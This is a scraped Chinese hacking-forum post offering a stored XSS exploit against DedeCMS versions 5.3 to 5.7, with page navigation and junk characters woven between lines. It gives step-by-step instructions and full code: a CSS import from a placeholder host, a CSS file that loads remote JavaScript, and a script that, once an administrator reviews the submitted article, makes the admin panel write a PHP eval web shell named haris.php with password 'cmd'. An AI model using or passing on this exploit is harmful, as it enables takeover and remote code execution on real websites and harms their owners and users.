找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1607|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
) M5 z, O5 [& G1 [为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
0 f8 J& Q4 n! P; u9 x" a6 b/ o目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
: P/ P% e5 c$ l6 \& q$ l7 K0 j下面说说利用方法。
, b( F& Q# z9 a, R$ l. t, w条件有2个:% c0 o7 A2 o1 j0 H( h7 q
1.开启注册
. Y/ x( t8 {9 R" w2.开启投稿
6 F8 Z( `) a9 u, N注册会员----发表文章
3 O' x7 b' `+ t4 }* T) U# ~/ ?内容填写:
% M+ q! k# ~& w8 ]# ^3 Q! ]复制代码' N! ]2 o( H; \2 \+ @& A( G3 l8 [
<style>@im\port'\http://xxx.com/xss.css';</style>
2 W* P1 A# N) C% ?8 T* e新建XSS.Css+ D: H/ h! f2 u1 d( X8 K5 r0 T$ P
复制代码+ c8 f0 }- }/ `6 K& e( ?: e# m
.body{
+ o. W6 ^" ?( Q, l7 N+ z; Dbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }: X% M: M2 R& }7 W: U* `. o  T( p- I
新建xss.js 内容为
% o' b' i) T1 g( Q' Z复制代码4 p5 j! u/ k  E5 c' I/ x; H
1.var request = false;/ {$ ?3 D* Z* ]! l0 o/ l8 i
2.if(window.XMLHttpRequest) {
5 f6 o" W( Q+ f3.request = new XMLHttpRequest();
( E' f2 ~, V3 b7 K5 E# f( Y0 A* [4.if(request.overrideMimeType) {
. b8 b5 X3 f& a7 b4 n( v$ y. M5.request.overrideMimeType('text/xml');9 {4 {8 p& F! Y) K/ F7 m' H- a
6.}  q3 J- X  O. Q  h5 ^! Q
7.} else if(window.ActiveXObject) {
: f2 _6 C( c$ x8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];, J$ ?! f6 y/ a
9.for(var i=0; i<versions.length; i++) {
6 m8 Q2 |" }2 a4 s9 y+ B$ D10.try {
; i( |$ Z% L3 b, m3 r11.request = new ActiveXObject(versions);
1 t8 y& ]. K+ k$ g12.} catch(e) {}
5 [7 i3 J  h- L& ~. y13.}
) ?' {% v7 \# p- B5 |0 f14.}  v' y) _* D* i2 i1 [
15.xmlhttp=request;
+ W% y1 L7 q/ x) |# h16.function getFolder( url ){& d# ~: G1 L2 {$ d# Y
17. obj = url.split('/')
: T$ ?6 _% k1 |0 H& P18. return obj[obj.length-2]& g" z+ E+ ]" F0 e4 W# T( _
19.}, u( Z+ G/ u/ T% M1 ~8 Z+ K2 P
20.oUrl = top.location.href;9 S* e1 N( h* {2 @2 D
21.u = getFolder(oUrl);, O$ g3 J/ y( \9 O8 q9 \. ]
22.add_admin();. Q9 Y7 p* K4 s4 C- m/ v
23.function add_admin(){9 ], `! M- u/ y. H
24.var url= "/"+u+"/sys_sql_query.php";
  u" d& s9 Z- C# l25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
1 w8 `( z+ {( `" A! u26.xmlhttp.open("POST", url, true);
( U6 W1 F" ~  c27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
" S, t, f- R7 V2 x28.xmlhttp.setRequestHeader("Content-length", params.length);
& S) w, e* M; N" m6 j6 v29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
. U) r' M8 D& X6 X: L30.xmlhttp.send(params);5 q$ \! t* t' S& m7 Q* B7 z
31.}
. o8 j9 e& n1 U# \; |+ ^) W当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表